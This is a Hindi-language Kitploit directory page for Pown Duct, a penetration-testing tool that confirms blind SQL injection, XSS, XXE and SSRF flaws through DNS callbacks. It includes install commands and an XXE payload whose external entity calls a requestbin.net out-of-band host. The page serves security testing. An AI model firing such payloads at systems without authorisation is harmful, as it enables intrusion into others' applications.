Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
duct — अंध इंजेक्शन हमलों का पता लगाने के लिए आवश्यक उपकरण। | Kitploit
उपकरण/GitHubGitHub/pownjs/duct
वेब एप्लिकेशन शोषणजानकारी एकत्र करनाDNS विश्लेषण
GitHubpownjs/duct

duct

अंध इंजेक्शन हमलों का पता लगाने के लिए आवश्यक उपकरण।

रिपॉजिटरी देखें
49137 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Follow on Twitter NPM Fury

Pown Duct

DNS साइड-चैनलों का उपयोग करके ब्लाइंड इंजेक्शन हमलों का पता लगाने के लिए आवश्यक उपकरण।

श्रेय

यह उपकरण secapps.com ओपन-सोर्स पहल का हिस्सा है।

root@kitploit:~
  ___ ___ ___   _   ___ ___  ___
 / __| __/ __| /_\ | _ \ _ \/ __|
 \__ \ _| (__ / _ \|  _/  _/\__ \
 |___/___\___/_/ \_\_| |_|  |___/
  https://secapps.com

नोट: यह उपकरण http://requestbin.net सेवा का लाभ उठा रहा है। भविष्य के संस्करण एक समर्पित, कस्टम-निर्मित बुनियादी ढांचे का उपयोग करेंगे।

त्वरित आरंभ

यह उपकरण Pown.js के भाग के रूप में उपयोग किए जाने के लिए है, लेकिन इसे एक स्वतंत्र उपकरण के रूप में अलग से भी चलाया जा सकता है।

पहले हमेशा की तरह Pown स्थापित करें:

root@kitploit:~
$ npm install -g pown@latest

सीधे Pown से लागू करें:

root@kitploit:~
$ pown duct

अन्यथा, इसे अपने प्रोजेक्ट के रूट से स्थानीय रूप से स्थापित करें:

root@kitploit:~
$ npm install @pown/duct --save

एक बार हो जाने के बाद, pown cli लागू करें:

root@kitploit:~
$ ./node_modules/.bin/pown-cli duct

आप वैश्विक pown का उपयोग करके भी उपकरण को स्थानीय रूप से लागू कर सकते हैं:

root@kitploit:~
$ POWN_ROOT=. pown duct

उपयोग

root@kitploit:~
pown duct <command>

Side-channel attack enabler

Commands:
  pown duct dns  DNS ducting

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]

pown duct dns

root@kitploit:~
pown duct dns

DNS ducting

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]
  --channel  Restore channel  [string]
  --output   Output format  [string] [choices: "string", "hexdump", "json"] [default: "string"]

ट्यूटोरियल

ऐसे मामले होते हैं जब हमें SQL इंजेक्शन, XSS, XXE या SSRF जैसे हमले करने की आवश्यकता होती है, लेकिन लक्ष्य अनुप्रयोग यह संकेत नहीं दे रहा है कि यह असुरक्षित है। यह सुनिश्चित करने का एक तरीका कि कोई भेद्यता मौजूद है, एक मान्य हमला वेक्टर इंजेक्ट करने का प्रयास करना है जो DNS रिज़ॉल्वर को एक नियंत्रित डोमेन के लिए पूछने के लिए मजबूर करता है। यदि रिज़ॉल्यूशन सफल होता है, तो हमले को सफल माना जाएगा।

नोट: आप Burp Collaborator से परिचित हो सकते हैं जो ग्राहकों के लिए एक समान सेवा प्रदान करता है।

पहले, हमें हल करने के लिए एक डिस्पोजेबल DNS नाम की आवश्यकता है:

root@kitploit:~
$ pown duct dns

screenshot

प्रदान किए गए DNS का उपयोग करके, अपना पेलोड तैयार करें। उदाहरण के लिए, निम्नलिखित एक DNS रिज़ॉल्यूशन को ट्रिगर कर सकता है यदि कोई XXE भेद्यता मौजूद है।

root@kitploit:~
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "http://showmethemoney.bfa8b8d3c25f09d5429f.d.requestbin.net">
]>
<foo>
&bar;
</foo>

यदि हमला सफल रहा, तो हमें टर्मिनल में एक संदेश प्राप्त होगा।

screenshot

टूल डाउनलोड करें